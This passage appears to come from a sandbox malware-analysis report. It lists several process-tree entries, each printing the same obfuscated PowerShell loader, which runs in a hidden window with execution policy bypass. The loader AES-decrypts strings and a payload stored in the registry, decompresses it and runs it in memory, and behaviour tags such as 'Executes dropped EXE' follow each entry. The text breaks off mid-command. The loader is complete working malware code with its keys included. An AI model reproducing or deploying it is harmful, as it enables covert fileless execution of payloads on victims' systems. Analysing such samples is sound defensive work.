$MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3320
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1600).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1600).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1600).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3728
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1600).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, 